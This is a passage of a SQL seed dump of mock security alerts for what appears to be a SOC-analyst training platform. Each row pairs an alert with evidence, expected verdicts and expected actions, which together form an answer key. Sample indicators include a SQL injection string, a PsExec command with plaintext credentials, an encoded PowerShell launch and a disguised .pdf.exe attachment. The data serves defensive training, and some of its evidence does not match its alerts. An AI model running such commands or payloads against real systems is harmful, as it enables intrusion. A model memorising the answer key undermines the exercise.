2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.264Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T09:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.2.10\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"ehr-server-01\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(625, 'Brute Force Attack Detected from Malicious IP', 'high', 'CrowdStrike', 'A series of failed login attempts were detected from an external IP address known for malicious activities.', 'Brute Force', 'T1110', 1, 'Closed', 95, '{\"timestamp\":\"2026-01-11T09:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-WORKSTATION1\",\"failed_attempts\":35}', '2026-01-10 01:20:02', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known user account within the organization\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address has a known history of brute force attacks, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(626, 'Malware Detected via EDR Signature', 'critical', 'Carbon Black', 'A malware file with a known signature was detected on a corporate workstation.', 'Malware', 'T1105', 1, 'investigating', 74, '{\"timestamp\":\"2026-01-11T10:20:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.11\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"CORP-WORKSTATION2\",\"command_line\":\"C:\\\\malware\\\\evil.exe\",\"file_hash\":\"abcd1234efgh5678ijkl9012mnopqrst\"}', '2026-01-10 11:52:11', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"abcd1234efgh5678ijkl9012mnopqrst\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as malware by 65 antivirus engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malware\\\\evil.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual file execution path\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash matches known malware signatures, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.266Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T10:20:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.11\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"asmith\\\",\\\"hostname\\\":\\\"CORP-WORKSTATION2\\\",\\\"command_line\\\":\\\"C:\\\\\\\\malware\\\\\\\\evil.exe\\\",\\\"file_hash\\\":\\\"abcd1234efgh5678ijkl9012mnopqrst\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(627, 'Phishing Email Detected with Malicious URL', 'high', 'Proofpoint', 'A phishing email was detected containing a URL that redirects to a malicious site.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"104.244.42.1\",\"email_sender\":\"phisher@maliciousdomain.com\",\"hostname\":\"mail.corp.com\",\"url\":\"http://maliciousdomain.com/login\"}', '2026-01-09 22:15:29', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Email associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL redirects to known phishing site\"}}],\"expected_actions\":[\"block_url\",\"educate_user\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a URL that redirects to a malicious site, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email Detected with Malicious URL\",\"date\":\"2026-02-01T20:32:22.267Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(628, 'SQL Injection Attack Detected on Web Server', 'critical', 'Wazuh', 'A SQL injection attempt was detected targeting the corporate web server.', 'Web Attack', 'T1190', 1, 'closed', NULL, '{\"timestamp\":\"2026-01-11T12:45:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.2\",\"dst_ip\":\"10.0.0.5\",\"hostname\":\"WEB-SERVER1\",\"request_body\":\"\' OR \'1\'=\'1\' --\"}', '2026-01-10 00:24:58', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.2\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple web attacks\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"harden_web_server\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request contains a clear SQL injection payload, confirming this as a true positive.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.268Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T12:45:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.2\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"hostname\\\":\\\"WEB-SERVER1\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(629, 'Suspicious Network Connection Detected', 'medium', 'Firewall', 'A network connection was made to an external IP known for suspicious activities.', 'Network Connection', 'T1041', 0, 'Closed', 225, '{\"timestamp\":\"2026-01-11T13:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.12\",\"dst_ip\":\"185.143.223.42\",\"hostname\":\"CORP-WORKSTATION3\"}', '2026-01-11 09:40:55', '2026-03-10 22:24:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 100 times for suspicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"monitor_traffic\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for suspicious activities, warranting further investigation.\"}', 'Novice', 'NDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(630, 'Failed Login Attempts Detected on Internal System', 'low', 'Splunk', 'Multiple failed login attempts were detected from an internal IP address. The source does not show any malicious history.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T14:10:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.20\",\"username\":\"mwhite\",\"hostname\":\"CORP-SERVER1\",\"failed_attempts\":8}', '2026-01-10 12:00:04', '2026-02-16 16:56:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"mwhite\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Known internal user\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed attempts were from an internal IP with no known malicious history.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:31:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:30:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:29:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"},{\"timestamp\":\"2026-02-01T20:28:22.270Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T14:10:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"mwhite\\\",\\\"hostname\\\":\\\"CORP-SERVER1\\\",\\\"failed_attempts\\\":8}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(631, 'Email with Potentially Malicious Attachment', 'medium', 'Proofpoint', 'An email was detected with an attachment that could potentially be malicious. The attachment is not flagged by any antivirus engines.', 'Phishing', 'T1566', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-11T15:20:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.5\",\"email_sender\":\"unknown@unknown.com\",\"hostname\":\"mail.corp.com\",\"file_hash\":\"1234567890abcdef1234567890abcdef\"}', '2026-01-09 16:19:52', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"unknown@unknown.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email from an unknown sender\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"1234567890abcdef1234567890abcdef\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash not detected as malicious by any antivirus engines\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The attachment is not flagged by any antivirus engines; hence it\'s considered a false positive.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Email with Potentially Malicious Attachment\",\"date\":\"2026-02-01T20:32:22.272Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(632, 'Unauthorized PSExec Execution Detected', 'high', 'Wazuh', 'An unauthorized execution of PSExec was detected on an internal server, indicating possible lateral movement.', 'Lateral Movement', 'T1569', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-11T16:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.30\",\"username\":\"admin\",\"hostname\":\"CORP-SERVER2\",\"command_line\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\"}', '2026-01-10 16:40:16', '2026-02-16 17:31:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.1.30 -u admin -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized use of PSExec tool\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Unauthorized execution of PSExec indicates possible lateral movement, confirming this as a true positive.\"}', 'Novice', 'EDR', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-11T16:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"CORP-SERVER2\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.30 -u admin -p password cmd.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.273Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
